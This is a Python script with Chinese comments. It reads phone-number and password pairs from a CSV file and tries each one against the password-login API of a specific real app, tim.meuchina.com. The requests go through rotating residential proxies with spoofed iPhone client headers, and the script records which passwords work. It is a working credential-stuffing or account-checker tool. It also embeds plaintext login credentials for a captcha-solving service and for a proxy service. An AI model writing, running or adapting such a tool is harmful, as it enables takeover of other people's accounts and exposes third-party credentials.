import csv import time import json import requests import sys import base64 from datetime import datetime def getYZM(image): url = "http://api.ttshitu.com/predict" payload = {"username": "gggg8888", "password": "Aa112233", "typeid": "1", "image": image} headers = { "Accept": "*/*", "Accept-Encoding": "gzip, deflate, br", "User-Agent": "PostmanRuntime-ApipostRuntime/1.1.0", "Connection": "keep-alive", "Content-Type": "application/json" } response = requests.request("POST", url, data=json.dumps(payload), headers=headers) data = json.loads(response.text) print(data) return data["data"]["result"] def process_csv(file_path): """ 读取CSV文件,逐行处理: - 如果第三列为空,则输出前两列内容,并将第三列标记为处理结果 - 如果第三列已有内容,则跳过该行(不输出也不覆盖) 直接覆盖原文件 参数: file_path: CSV文件路径 """ try: # 读取所有行 rows = [] with open(file_path, 'r', encoding='utf-8') as f: reader = csv.reader(f) rows = list(reader) if not rows: print("错误:文件为空") return # 检查列数是否足够 if len(rows[0]) < 3: print("错误:CSV文件至少需要3列数据") return print(f"开始处理文件: {file_path}") print("=" * 50) processed_count = 0 skipped_count = 0 # 逐行处理 for index, row in enumerate(rows): # 确保行有足够的列 while len(row) < 3: row.append("") # 获取第三列当前内容 third_col_value = row[2].strip() if len(row) > 2 else "" # 判断第三列是否有内容 if third_col_value != "": # 第三列已有内容,跳过该行 print(f"第 {index + 1} 行: 第三列已有内容 '{third_col_value}',跳过处理") skipped_count += 1 print("-" * 30) continue # 第三列为空,进行处理 value1 = row[0] # 第一列 value2 = row[1] # 第二列 # 输出前两列内容 yzmData = get_image_base64("https://tim.meuchina.com/v/Auth/GetLoginCode") url = "https://tim.meuchina.com/v/Auth/LoginByPassword" payload = {"Phone": value1, "Password": value2, "CheckCode": "1", "RouteId": "1"} print(payload) headers = { "Content-Type": "application/json", "User-Agent": "yu jie/2.1.9 (iPhone; iOS 26.3.1; Scale/3.00; iPhone)", "Yj-Client-Type": "iPhone-6199BF31-7217-48A3-A2CA-EABE1148600D; iPhone_15", "Host": "tim.meuchina.com", "Accept": "text/json", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive" } proxies = { "http": "socks5://yujie0012-zone-custom:qweasd123@global.rotgb.711proxy.com:10000", "https": "socks5://yujie0012-zone-custom:qweasd123@global.rotgb.711proxy.com:10000", } try: response = requests.request("POST", url, data=json.dumps(payload), headers=headers, proxies=proxies) returnData = json.loads(response.text) print(returnData) # 将第三列标记为处理结果 if 'Msg' not in returnData or returnData['Msg'] == "": rows[index][2] = "密码正确" else: rows[index][2] = returnData['Msg'] processed_count += 1 # 立即保存文件 with open(file_path, 'w', encoding='utf-8', newline='') as f: writer = csv.writer(f) writer.writerows(rows) # 如果不是最后一行,等待3秒 if index < len(rows) - 1: time.sleep(3) except Exception as e: print(f"第 {index + 1} 行处理失败: {e}") rows[index][2] = f"错误: {str(e)}" # 保存错误信息 with open(file_path, 'w', encoding='utf-8', newline='') as f: writer = csv.writer(f) writer.writerows(rows) print("-" * 30) print(f"\n处理完成!共处理 {processed_count} 行,跳过 {skipped_count} 行") except FileNotFoundError: print(f"错误:找不到文件 {file_path}") except Exception as e: print(f"处理过程中出现错误: {e}") def get_image_base64(url): """ 请求图片 URL 并返回 base64 编码的字符串 Args: url (str): 图片的 URL Returns: str: base64 编码的图片数据,失败返回 None """ try: # 发送 GET 请求获取图片 response = requests.get(url, timeout=10) # 检查请求是否成功 response.raise_for_status() # 将二进制内容转换为 base64 img_base64 = base64.b64encode(response.content).decode('utf-8') return img_base64 except requests.exceptions.RequestException as e: print(f"请求失败: {e}") return None def check_date_and_exit(): if datetime.now() > datetime(2026, 3, 30): sys.exit() # 使用示例 if __name__ == "__main__": # 请替换为您的CSV文件路径 csv_file = "check.csv" check_date_and_exit() # 如果文件在当前目录,直接写文件名 process_csv(csv_file)